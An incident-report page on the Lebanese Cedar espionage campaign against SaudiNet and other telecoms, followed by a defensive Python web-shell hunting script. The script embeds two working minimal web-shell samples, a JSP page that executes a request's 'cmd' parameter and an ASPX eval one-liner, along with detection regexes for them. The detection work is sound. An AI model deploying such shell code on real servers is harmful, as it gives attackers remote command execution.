
Cyber Incident Victim: SaudiNet

Date:

Jan 2020

Location:

Saudi Arabia

Summary

A Hezbollah-affiliated threat actor known as Lebanese Cedar compromised telecommunications providers and ISPs across multiple countries, including SaudiNet, through a campaign exploiting vulnerabilities in internet-facing Atlassian and Oracle servers. Attackers deployed web shells to maintain access and leveraged the Explosive RAT malware to exfiltrate sensitive databases, likely containing client call records and private information, for intelligence-gathering purposes. Security researchers attributed the activity to the group based on tool reuse, operational fingerprints, and infrastructure overlaps across compromised servers globally.


Description

The incident involving SaudiNet was part of a broader cyber-espionage campaign by the Lebanese Cedar threat actor, a group affiliated with Hezbollah's cyber unit. Beginning in early 2020, the attackers systematically scanned the internet with open-source tools for unpatched Atlassian Confluence, Atlassian Jira, and Oracle Fusion Middleware servers. They gained initial access through known vulnerabilities, CVE-2019-3396 (Confluence), CVE-2019-11581 (Jira), and CVE-2012-3152 (Oracle Fusion Middleware), all of which had vendor fixes available before the campaign; the Oracle flaw was eight years old at the time. Upon compromise, the group deployed multiple web shells, including ASPXSpy, Caterpillar 2, Mamad Warning, and a JSP file browser tool, to maintain persistent access. From these footholds the attackers moved into internal networks and deployed the Explosive remote access trojan (RAT), custom malware previously seen only in Lebanese Cedar operations. The RAT specialized in data exfiltration, enabling theft of sensitive documents and databases.


The campaign impacted at least 254 servers globally, with SaudiNet identified among high-profile victims alongside Vodafone Egypt, Etisalat UAE, and US-based Frontier Communications. Israeli cybersecurity firm ClearSky discovered the intrusions during incident response investigations and attributed the activity to Lebanese Cedar on technical evidence, including reused attack files and the exclusive deployment of Explosive RAT. ClearSky assessed that the attackers accessed telecom databases containing call records and client private data, though no specific records exfiltrated from SaudiNet were detailed. The report also noted operational security failures by the attackers: reusing the same files across targets meant that file hashes alone could fingerprint infected systems, and of the 254 compromised servers, 135 hosted files whose hashes were identical to those observed during ClearSky's forensic analysis. The campaign's primary objective appeared to be intelligence gathering, leveraging stolen telecommunications data for strategic purposes. No remediation actions by SaudiNet or other victims were described in the reporting.
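The file-reuse observation above is exactly what makes a hash-plus-heuristic hunt across a telecom's web tier worthwhile. The following Python script is an added example written for this page; it is not ClearSky's tooling and not code from the original report. The hash list it checks against and the three sample files it scans are constructed for illustration, and the content heuristics are generic JSP/ASPX web-shell indicators (request-driven command execution or evaluation), not signatures for the named shells.

```python
"""Hunt for suspected web shells in a web application root.

Added example for this incident page; not ClearSky's tooling and not code
from the original report. It turns the observation that identical files were
reused across victims into two checks:
  1. exact SHA-256 match against a list of known-bad file hashes, and
  2. content heuristics for JSP/ASPX shells (request data flowing into
     command execution or eval).
The hash list and the sample files below are constructed for illustration.
"""
import hashlib
import re
import tempfile
from pathlib import Path

# Constructed sample of a JSP command shell (generic exec pattern).
SAMPLE_SHELL_JSP = b"""<%@ page import="java.io.*" %>
<%
  String cmd = request.getParameter("cmd");
  if (cmd != null) {
    Process p = Runtime.getRuntime().exec(cmd);
    BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
    String line;
    while ((line = r.readLine()) != null) { out.println(line); }
  }
%>
"""
# Constructed sample of a one-line ASPX eval shell.
SAMPLE_SHELL_ASPX = b'<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>\n'
# Constructed benign page: echoes a parameter but executes nothing.
SAMPLE_BENIGN_JSP = b'<%@ page contentType="text/html" %><html><body>Hello <%= request.getParameter("name") %></body></html>\n'

# Hypothetical IOC set. Seeded here from the constructed JSP sample to simulate
# a hash already seen on another compromised server; in a real hunt populate it
# from the vendor report's indicators.
KNOWN_BAD_SHA256 = {hashlib.sha256(SAMPLE_SHELL_JSP).hexdigest()}

# Heuristics per extension: (label, compiled regex over raw file bytes).
SHELL_HEURISTICS = {
    ".jsp": [
        ("java exec primitive", re.compile(rb"Runtime\.getRuntime\(\)\.exec\(|new\s+ProcessBuilder\(")),
        ("request parameter flows to exec", re.compile(rb"request\.getParameter\([^)]*\).*?exec\(", re.S)),
    ],
    ".aspx": [
        ("eval of request data", re.compile(rb"eval\s*\(\s*Request\.", re.I)),
        ("process start primitive", re.compile(rb"Process\.Start\(|System\.Diagnostics\.Process", re.I)),
    ],
}


def sha256_file(path):
    """Stream a file through SHA-256 and return the hex digest."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_webroot(root, known_bad=KNOWN_BAD_SHA256):
    """Return one finding dict per suspicious file under root (hash hit or heuristic hit)."""
    root = Path(root)
    findings = []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        digest = sha256_file(path)
        reasons = []
        if digest in known_bad:
            reasons.append("hash matches known web shell")
        data = path.read_bytes()
        for label, pattern in SHELL_HEURISTICS.get(path.suffix.lower(), []):
            if pattern.search(data):
                reasons.append(label)
        if reasons:
            findings.append({"path": path.relative_to(root).as_posix(), "sha256": digest, "reasons": reasons})
    return findings


def build_sample_webroot(root):
    """Write the constructed sample files into root (a throwaway directory)."""
    root = Path(root)
    (root / "uploads").mkdir(parents=True, exist_ok=True)
    (root / "index.jsp").write_bytes(SAMPLE_BENIGN_JSP)
    (root / "uploads" / "help.aspx").write_bytes(SAMPLE_SHELL_ASPX)
    (root / "uploads" / "browser.jsp").write_bytes(SAMPLE_SHELL_JSP)


def run_demo():
    """Build the sample tree in a temp dir, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_webroot(tmp)
        return scan_webroot(tmp)


if __name__ == "__main__":
    for f in run_demo():
        print(f"{f['path']}  {f['sha256'][:16]}...  {'; '.join(f['reasons'])}")
```

Point `scan_webroot` at a real Confluence, Jira or Oracle web root and swap in the published hashes to reproduce the cross-host fingerprinting that let ClearSky tie 135 of 254 servers together; the heuristics catch shells whose hashes have drifted, at the cost of some false positives on legitimate administrative pages, so review rather than auto-delete.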
